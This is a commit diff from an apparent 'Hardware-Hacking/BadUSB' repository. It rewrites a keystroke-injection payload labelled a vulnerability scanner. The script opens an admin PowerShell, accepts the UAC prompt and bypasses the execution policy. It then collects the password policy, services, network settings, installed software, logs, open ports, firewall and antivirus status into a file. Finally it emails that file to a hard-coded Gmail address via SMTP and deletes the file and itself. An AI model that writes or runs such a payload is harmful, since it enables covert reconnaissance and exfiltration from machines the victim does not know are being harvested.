Hardware-Hacking/BadUSB
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Update 3.0. VulnerabilityScanner

Browse Source
This commit is contained in:
Mark
2024-05-20 13:58:40 -04:00
committed by GitHub
parent e70da4fb0c
commit 8222a3eff3
1 changed files with 223 additions and 224 deletions
Download Patch File Download Diff File Expand all files Collapse all files
3.0. VulnerabilityScanner
+223 -224
View File
@@ -1,345 +1,344 @@
REM script in progress
DELAY 5000
DELAY 1000
REM Open Start Menu
CONTROL ESCAPE
DELAY 3000
STRING powershell
DELAY 3000
REM Navigate to the context menu to run PowerShell as an administrator
DELAY 1500
DELAY 2000
RIGHTARROW
DELAY 1500
DELAY 500
DOWNARROW
DELAY 1500
DELAY 500
ENTER
DELAY 5000
ALT Y
DELAY 5000
REM Set PowerShell Execution Policy to Bypass
DELAY 500
STRING Set-ExecutionPolicy Bypass -Scope Process -Force
DELAY 500
DELAY 1000
STRING set-executionpolicy bypass -scope process -force
DELAY 100
ENTER
DELAY 500
DELAY 400
REM Create the PowerShell script in memory and execute it
DELAY 500
STRING $securePassword = ConvertTo-SecureString 'YourAppSpecificPassword' -AsPlainText -Force
DELAY 500
DELAY 100
STRING $securepassword = convertto-securestring 'YourAppSpecificPassword' -asplaintext -force
DELAY 100
ENTER
DELAY 500
STRING $credential = New-Object System.Management.Automation.PSCredential ('igrowsc@gmail.com', $securePassword)
DELAY 500
DELAY 400
STRING $credential = new-object system.management.automation.pscredential ('igrowsc@gmail.com', $securepassword)
DELAY 100
ENTER
DELAY 500
DELAY 400
STRING $script = {
DELAY 500
DELAY 100
ENTER
DELAY 500
STRING function Check-PasswordPolicy {
DELAY 500
DELAY 400
STRING function check-passwordpolicy {
DELAY 100
ENTER
DELAY 500
DELAY 400
STRING net accounts
DELAY 500
DELAY 100
ENTER
DELAY 500
DELAY 400
STRING }
DELAY 500
DELAY 100
ENTER
DELAY 500
STRING function Audit-Services {
DELAY 500
DELAY 400
STRING function audit-services {
DELAY 100
ENTER
DELAY 500
STRING Get-Service | Select-Object Name, DisplayName, Status, StartType
DELAY 500
DELAY 400
STRING get-service | select-object name, displayname, status, starttype
DELAY 100
ENTER
DELAY 500
DELAY 400
STRING }
DELAY 500
DELAY 100
ENTER
DELAY 500
STRING function Check-NetworkSettings {
DELAY 500
DELAY 400
STRING function check-networksettings {
DELAY 100
ENTER
DELAY 500
STRING Get-NetIPConfiguration
DELAY 500
DELAY 400
STRING get-netipconfiguration
DELAY 100
ENTER
DELAY 500
DELAY 400
STRING }
DELAY 500
DELAY 100
ENTER
DELAY 500
STRING function Check-SoftwareVulnerabilities {
DELAY 500
DELAY 400
STRING function check-softwarevulnerabilities {
DELAY 100
ENTER
DELAY 500
STRING Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher
DELAY 500
DELAY 400
STRING get-itemproperty hklm:\software\wow6432node\microsoft\windows\currentversion\uninstall\* | select-object displayname, displayversion, publisher
DELAY 100
ENTER
DELAY 500
DELAY 400
STRING }
DELAY 500
DELAY 100
ENTER
DELAY 1000
STRING function Check-CVE {
DELAY 1000
DELAY 400
STRING function check-cve {
DELAY 100
ENTER
DELAY 1000
DELAY 400
STRING param (
DELAY 1000
DELAY 100
ENTER
DELAY 1000
STRING [string]$productName,
DELAY 1000
DELAY 400
STRING [string]$productname,
DELAY 100
ENTER
DELAY 1000
DELAY 400
STRING [string]$version
DELAY 1000
DELAY 100
ENTER
DELAY 1000
DELAY 400
STRING )
DELAY 1000
DELAY 100
ENTER
DELAY 1000
STRING $uri = "https://services.nvd.nist.gov/rest/json/cves/1.0?keyword=$productName+$version"
DELAY 1000
DELAY 400
STRING $uri = "https://services.nvd.nist.gov/rest/json/cves/1.0?keyword=$productname+$version"
DELAY 100
ENTER
DELAY 1000
STRING Start-Sleep -Seconds 5
DELAY 500
DELAY 400
STRING start-sleep -seconds 5
DELAY 100
ENTER
DELAY 500
STRING $response = Invoke-RestMethod -Uri $uri -Method Get
DELAY 1000
DELAY 400
STRING $response = invoke-restmethod -uri $uri -method get
DELAY 100
ENTER
DELAY 1000
STRING if ($response.totalResults -gt 0) {
DELAY 500
DELAY 400
STRING if ($response.totalresults -gt 0) {
DELAY 100
ENTER
DELAY 500
STRING foreach ($cve in $response.result.CVE_Items) {
DELAY 500
DELAY 400
STRING foreach ($cve in $response.result.cve_items) {
DELAY 100
ENTER
DELAY 500
STRING "$($cve.cve.CVE_data_meta.ID) - $($cve.cve.description.description_data[0].value)"
DELAY 500
DELAY 400
STRING "$($cve.cve.cve_data_meta.id) - $($cve.cve.description.description_data[0].value)"
DELAY 100
ENTER
DELAY 500
DELAY 400
STRING }
DELAY 500
DELAY 100
ENTER
DELAY 500
DELAY 400
STRING } else {
DELAY 500
DELAY 100
ENTER
DELAY 500
STRING "No CVEs found for $productName $version"
DELAY 500
DELAY 400
STRING "no cves found for $productname $version"
DELAY 100
ENTER
DELAY 500
DELAY 400
STRING }
DELAY 500
DELAY 100
ENTER
DELAY 500
DELAY 400
STRING }
DELAY 500
DELAY 100
ENTER
DELAY 500
STRING function Analyze-Logs {
DELAY 500
DELAY 400
STRING function analyze-logs {
DELAY 100
ENTER
DELAY 500
STRING Get-EventLog -LogName System -Newest 100
DELAY 500
DELAY 400
STRING get-eventlog -logname system -newest 100
DELAY 100
ENTER
DELAY 500
DELAY 400
STRING }
DELAY 500
DELAY 100
ENTER
DELAY 500
STRING function Check-OpenPorts {
DELAY 500
DELAY 400
STRING function check-openports {
DELAY 100
ENTER
DELAY 500
DELAY 400
STRING netstat -an
DELAY 500
DELAY 100
ENTER
DELAY 500
DELAY 400
STRING }
DELAY 500
DELAY 100
ENTER
DELAY 500
STRING function Check-MissingUpdates {
DELAY 500
DELAY 400
STRING function check-missingupdates {
DELAY 100
ENTER
DELAY 500
STRING Get-WindowsUpdateLog
DELAY 500
DELAY 400
STRING get-windowsupdatelog
DELAY 100
ENTER
DELAY 500
DELAY 400
STRING }
DELAY 500
DELAY 100
ENTER
DELAY 500
STRING function Check-FirewallStatus {
DELAY 500
DELAY 400
STRING function check-firewallstatus {
DELAY 100
ENTER
DELAY 500
DELAY 400
STRING netsh advfirewall show allprofiles
DELAY 500
DELAY 100
ENTER
DELAY 500
DELAY 400
STRING }
DELAY 500
DELAY 100
ENTER
DELAY 500
STRING function Check-SMBv1Status {
DELAY 500
DELAY 400
STRING function check-smbv1status {
DELAY 100
ENTER
DELAY 500
STRING Get-WindowsOptionalFeature -Online -FeatureName SMB1Protocol
DELAY 500
DELAY 400
STRING get-windowsoptionalfeature -online -featurename smb1protocol
DELAY 100
ENTER
DELAY 500
DELAY 400
STRING }
DELAY 500
DELAY 100
ENTER
DELAY 500
STRING function Check-AntivirusStatus {
DELAY 500
DELAY 400
STRING function check-antivirusstatus {
DELAY 100
ENTER
DELAY 500
STRING Get-MpComputerStatus
DELAY 500
DELAY 400
STRING get-mpcomputerstatus
DELAY 100
ENTER
DELAY 500
DELAY 400
STRING }
DELAY 500
DELAY 100
ENTER
DELAY 500
STRING function Send-EmailAndCleanup {
DELAY 500
DELAY 400
STRING function send-emailandcleanup {
DELAY 100
ENTER
DELAY 500
DELAY 400
STRING param (
DELAY 500
DELAY 100
ENTER
DELAY 500
STRING [string]$smtpServer,
DELAY 500
DELAY 400
STRING [string]$smtpserver,
DELAY 100
ENTER
DELAY 500
STRING [string]$smtpFrom,
DELAY 500
DELAY 400
STRING [string]$smtpfrom,
DELAY 100
ENTER
DELAY 500
STRING [string]$smtpTo,
DELAY 500
DELAY 400
STRING [string]$smtpto,
DELAY 100
ENTER
DELAY 500
STRING [string]$messageSubject,
DELAY 500
DELAY 400
STRING [string]$messagesubject,
DELAY 100
ENTER
DELAY 500
STRING [string]$messageBody,
DELAY 500
DELAY 400
STRING [string]$messagebody,
DELAY 100
ENTER
DELAY 500
STRING [string]$attachmentPath,
DELAY 500
DELAY 400
STRING [string]$attachmentpath,
DELAY 100
ENTER
DELAY 500
STRING [System.Management.Automation.PSCredential]$credential
DELAY 500
DELAY 400
STRING [system.management.automation.pscredential]$credential
DELAY 100
ENTER
DELAY 500
DELAY 400
STRING )
DELAY 500
DELAY 100
ENTER
DELAY 500
STRING $smtp = New-Object Net.Mail.SmtpClient($smtpServer)
DELAY 500
DELAY 400
STRING $smtp = new-object net.mail.smtpclient($smtpserver)
DELAY 100
ENTER
DELAY 500
STRING $smtp.Credentials = $credential
DELAY 500
DELAY 400
STRING $smtp.credentials = $credential
DELAY 100
ENTER
DELAY 500
STRING $smtp.EnableSsl = $true
DELAY 500
DELAY 400
STRING $smtp.enablessl = $true
DELAY 100
ENTER
DELAY 500
STRING $smtp.Send($smtpFrom, $smtpTo, $messageSubject, $messageBody + (Get-Content -Path $attachmentPath -Raw))
DELAY 500
DELAY 400
STRING $smtp.send($smtpfrom, $smtpto, $messagesubject, $messagebody + (get-content -path $attachmentpath -raw))
DELAY 100
ENTER
DELAY 500
STRING Remove-Item -Path $attachmentPath
DELAY 500
DELAY 400
STRING remove-item -path $attachmentpath
DELAY 100
ENTER
DELAY 500
DELAY 400
STRING }
DELAY 500
DELAY 100
ENTER
DELAY 500
STRING Check-PasswordPolicy > results.txt
DELAY 500
DELAY 400
STRING check-passwordpolicy > results.txt
DELAY 100
ENTER
DELAY 500
STRING Audit-Services >> results.txt
DELAY 500
DELAY 400
STRING audit-services >> results.txt
DELAY 100
ENTER
DELAY 500
STRING Check-NetworkSettings >> results.txt
DELAY 500
DELAY 400
STRING check-networksettings >> results.txt
DELAY 100
ENTER
DELAY 500
STRING Check-SoftwareVulnerabilities >> results.txt
DELAY 500
DELAY 400
STRING check-softwarevulnerabilities >> results.txt
DELAY 100
ENTER
DELAY 500
STRING Analyze-Logs >> results.txt
DELAY 500
DELAY 400
STRING analyze-logs >> results.txt
DELAY 100
ENTER
DELAY 500
STRING Check-OpenPorts >> results.txt
DELAY 500
DELAY 400
STRING check-openports >> results.txt
DELAY 100
ENTER
DELAY 500
STRING Check-MissingUpdates >> results.txt
DELAY 500
DELAY 400
STRING check-missingupdates >> results.txt
DELAY 100
ENTER
DELAY 500
STRING Check-FirewallStatus >> results.txt
DELAY 500
DELAY 400
STRING check-firewallstatus >> results.txt
DELAY 100
ENTER
DELAY 500
STRING Check-SMBv1Status >> results.txt
DELAY 500
DELAY 400
STRING check-smbv1status >> results.txt
DELAY 100
ENTER
DELAY 500
STRING Check-AntivirusStatus >> results.txt
DELAY 500
DELAY 400
STRING check-antivirusstatus >> results.txt
DELAY 100
ENTER
DELAY 500
STRING Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | ForEach-Object { Check-CVE -productName $_.DisplayName -version $_.DisplayVersion } >> results.txt
DELAY 500
DELAY 400
STRING get-itemproperty hklm:\software\wow6432node\microsoft\windows\currentversion\uninstall\* | foreach-object { check-cve -productname $_.displayname -version $_.displayversion } >> results.txt
DELAY 100
ENTER
DELAY 500
STRING Send-EmailAndCleanup -smtpServer "smtp.gmail.com" -smtpFrom "igrowsc@gmail.com" -smtpTo "igrowsc@gmail.com" -messageSubject "Vulnerability Scan Results" -messageBody "Attached are the results of the vulnerability scan." -attachmentPath "results.txt" -credential $credential
DELAY 500
DELAY 400
STRING send-emailandcleanup -smtpserver "smtp.gmail.com" -smtpfrom "igrowsc@gmail.com" -smtpto "igrowsc@gmail.com" -messagesubject "vulnerability scan results" -messagebody "attached are the results of the vulnerability scan." -attachmentpath "results.txt" -credential $credential
DELAY 100
ENTER
DELAY 500
STRING Remove-Item -Path $MyInvocation.MyCommand.Path
DELAY 500
DELAY 400
STRING remove-item -path $myinvocation.mycommand.path
DELAY 100
ENTER
DELAY 500
DELAY 400
STRING }
DELAY 500
DELAY 100
ENTER
DELAY 500
STRING Invoke-Command -ScriptBlock $script
DELAY 500
DELAY 400
STRING invoke-command -scriptblock $script
DELAY 100
ENTER
DELAY 20000